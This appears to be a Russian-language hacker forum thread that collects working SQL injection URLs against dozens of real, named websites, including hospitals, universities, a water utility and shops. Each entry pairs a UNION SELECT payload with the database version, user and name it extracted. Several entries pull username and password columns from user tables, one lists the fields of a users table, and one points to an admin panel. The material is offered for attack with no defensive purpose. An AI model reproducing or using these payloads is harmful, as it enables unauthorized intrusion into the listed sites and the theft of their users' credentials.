SQL Инъекции

Code:

http://www.xxbt.com/cartoon.php?id=-1+union+select+1,2,3,4/*

Version: 5.0.22-log
Database: xxbt
User: xxbt_f@localhost

 

---

 

Code:

http://www.freefloat.net/content.php?section_id=1&subsection_id=5&ID=42+and+1=0+Union%20Select%201,2,version%28%29,4,5,6%20--

Version = 4.0.18-standard-log
User = root@localhost
Database = freefloat

 

Code:

http://calodox.scene.org/demoo/select.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

Version: 5.0.77-1
Database: calodox
User: [email protected]

---------------------------------------------

Code:

http://www.mnhospitaljobs.com/hospitalprofile-select.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

Version: 5.0.81-community
Database: dsmmn_mnhospit
User: dsmmn_llcoolb@localhost

 

http://www.axcent.ro/detalii_produs.php?lang=romana&ID=225&m_catid=161&pID=-450+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--


Database Version: 4.1.20-log
Database name: netaxcentro
User name: [email protected]
Os: redhat-linux-gnu


http://www.denisamarket.ro/produs.php?lang=romana&ID=-58+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7--%20&m_catid=13


Database Version: 4.1.20-log
Database name: netdenisamarketro
User name: [email protected]
Os: redhat-linux-gnu

 

Code:

http://jaydonaldson.com/section.php?section_id=1+and+1=0+Union%20Select%20UNHEX%28HEX%28version%28%29%29%29

Version = 5.0.77-community
User = donaldso_jaydona@localhost
Database = donaldso_jaydonaldson

PR: 6

Code:

http://www.manilawater.com/section.php?section_id=6&category_id=34+and+1=0+%20Union%20Select%201,2,3,version%28%29,5,6,7,8%20,9%20,10

Version = 5.0.32-Debian_7etch11-log
Database = spark-mwc
User = spark-mwc@localhost
Tables:users
Columns: Table users
user_login
user_password
user_name
user_email
user_type
user_status

PR: 4

Code:

http://www.autocam.com/main.php?section_id=6+and+1=0+%20Union%20Select%20%20%20UNHEX%28HEX%28version%28%29%29%29%20,2,3,4,5,6,7,8,9

Version = 4.1.16-standard
User = [email protected]
Database = autocam

Code:

http://www.leefirerescue.com/view.php?section_id=18+and+1=0+Union Select 1,UNHEX(HEX(version())),3 -- 

Version = 5.0.77-community
User = leefddb@localhost
Database = leefd
Lensys
Rogue
SpamAssassin
Timesheets
Vtodd
agency
bfd1sql
dcaffiliate
easyadmin
ebdesign
er_ares_members
fnclist
gbwphpcollab
graphicdetails
hamptonattack
jackbingham
k1foo
lenharth
lensync_joomla
lightware
mysql
mysqlorig
nmhfdb
nuke
pcarc
portal
rowley
scffwa
seacoastbb
secret
space
telacovers
test
trimark_dada
trimark_mambo
vpopmail
vtodddb
w1roc_bb
w1wqm

Code:

http://www.courierjournal.net/sectionfront.php?section_id=7+and+1=0+Union%20Select%201,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%20--

Version = 4.0.27
User = cjadmin@localhost
Database = cjnet

 

Housing Development Corporation:

Code:

http://www.hdc.com.mv/Projects/project-select.php?id=-1)/**/union/**/select/**/unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user())),unhex(hex(user()))/*

Version: 4.1.7
Database: hdc
User: [email protected]

Ух, задолбался с ней...

 

Democratic Pacific Union:

Code:

http://www.dpu.org.tw/En/Service.php?ID=37&ArticleID=-1+union+select+1,2,unhex(hex(version()))--

Version: 5.0.18
Database: dpu_database
User: root@localhost

Вывод - в ссылке на картинку "Download Now".

-------------------------------------------------------------
Institution Régionale des Sourds et des Aveugles:

Code:

http://www.irsa.fr/service.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--

Version: 5.0.81-0.dotdeb.0-log
Database: H206901
User: H2069@localhost

------------------------------------------------------------
MasterLube:

Code:

http://www.masterlube.com/services/service.php?id=-1+union+select+1,2,3,4,5,6,7--

Version: 4.1.12-log
Database: mayzie
User: mailbox@localhost

 

Code:

http://ski.stel.ru/rus/forage.shtml?id=-236+union+select+1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

4.1.25:arasia@localhost:skivagi: portbld-freebsd6.1

Code:

http://www.elmh.ru/elmcatalog/?subclass=-1+union+select+1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os)--

4.0.27-log:[email protected]:elektromash:i86pc-solaris2.8

Code:

http://www.loretta.ru/?view=-868+union+select+1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os)--

4.1.22-standard:[email protected]:loretta: pc-linux-gnu

Code:

http://www.stplus.ru/content.php?id=-22+union+select+1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4--

5.0.32-Debian_7etch11-log:stplusru_db@localhost:stplusru_db: pc-linux-gnu

Code:

http://rybalka.zooclub.ru/indexr.php?id=1+union+select+1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os)--

5.0.81-community-log:zooclub_zooclub@localhost:zooclub_rybalka: pc-linux-gnu

Code:

http://www.ma3da.ru/downloads.php?dg_id=1/**/union/**/select/**/1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),3

5.0.56-lk-log:ma3daru@localhost:ma3daru: pc-linux-gnu

Code:

http://www.jobru.ru/?act=data&from=podrubriki&type=resume&id=-1+union+select+1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),3,4--

5.0.27:ariadna@localhost:jobru:redhat-linux-gnu

Code:

http://www.audi-vitebskiy.ru/index.php?ob=car_comp&idclass=-1/**/union/**/select/**/1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4,5,6/*

4.1.25-log:00131350@localhost:db00131350:unknown-freebsd4.10

 

Manches LP:

Code:

http://www.manches.com/practices/family/service.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

Version: 5.0.45
Database: manches
User: manches@localhost

 

Code:

http://www.skags.ru/dissov.php?uid=-1+union+select+1,2,3

4.0.23
SKAGS_DB
tabl poll_user


http://www.skags.ru/dissov.php?uid=-1+union+select+1,concat_ws%280x3b,username,userpass%29,3+from+poll_user--

 

Strategic Energy Research
4.1.22-max-log:energy:[email protected]:sun-solaris2.9

Code:

http://www.energy.gatech.edu/research/research.php?id=-1+union+select+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3,4--

админка
http://www.energy.gatech.edu/admin/

 

http://www.promen.ro/produs.php?id=i-1&subcat=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)--


Database Version: 4.1.22-standard-log
Database name: promen_promencontent
User name: promen_root@localhost
Os: pc-linux-gnu

 

Formel3.de pr4
ATS Formel 3 Cup

Code:

[COLOR=SlateGray]http://www.formel3.de/news.php
?id=null+union+select+null,concat_ws(char(32,124,32),version(),user(),database(),@@version_compile_os),null,null,null,null,null,null[/COLOR]

4.1.22-standard-log | db161837_7@local2 | db161837_7 | pc-linux-gnu

 

Проезжая в автобусе решил чемнибудь заняться, а конкретно, тряхнуть стариной и поискать скули в постгре
http://www.vgihs.edu.in/popnews.php?nid=-4+union+select+usename||chr(58)||passwd+from+pg_user+limit+1+offset+2--

http://www.vgihs.edu.in/popnews.php?nid=-4;select+cast(version()+as+int)--
PostgreSQL 8.0.8 on i386-redhat-linux-gnu, compiled by GCC i386-redhat-linux-gcc (GCC) 4.0.2 20051125 (Red Hat 4.0.2-8)

кста edu)

 

ГИПЕРМАРКЕТЫ «КАРУСЕЛЬ»

Code:

karusel_www:karusel@localhost:5.0.45-log

 

sweeto.co.uk PR-1

Code:

http://euwb.sweeto.co.uk/thread.php?threadid=-350+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8+--+&page=3

Code:

5.0.82-community:web81-sweeto@localhost:web81-sweeto

stratfordboilerstoves.co.uk PR-3

Code:

http://www.stratfordboilerstoves.co.uk/online_spares.php?model=%27+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9+--+

Code:

5.0.82-community:[email protected]:web100-aarrow

shakies.co.uk PR-2

Code:

http://www.shakies.co.uk/vote/results.php?pollid=1%27+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5+--+

Code:

5.0.82-community:web80-vote@localhost:web80-vote

 

http://www.katemagic.ru/index2.php?kind=-0+union+select+1,2,3,4,5,6,7,8,9,10,11+--+

http://www.assotecnicaofferte.it/pop.php?ID=-877+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+/*+

http://www.usefulandagreeable.com/magazine.php?id=-35'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105+/*+


http://www.nourhaikphoto.com/photos.php?groupe=144&album=-518+union+select+1,2,3,4,5,pass+from+user+/*+

http://livenloudmagazine.com/photos.php?groupe=95&album=-122+union+select+1,2,3,4,5,pass+from+user+/*+

 

На этот раз мускул
http://vmcenter.ru/newsdetail.php?id=-4+union+select+group_concat(0x0b,column_name)+from+information_schema.columns+where+table_name=0x7573657273
MySQL 5.0.27
http://vmcenter.ru/newsdetail.php?id=-4+union+select+concat(0x0b,login,0x3a,password)+from+users
судя по всему эта таблица пуста

 

институт МГИМО

Code:

http://www.miu.mgimo.ru/siteindex.php?page=38&mode=group&edtype=1&gradyear=9&specialty=&id=-16+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--

4.1.21-community-nt:mgimo_miu:mgimo_miu@localhost:Win32

Code:

http://education.centrinvest.ru/person.php?id=-1544704+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),14,15,16,17--

5.0.70-log:edu:edu@localhost: pc-linux-gnu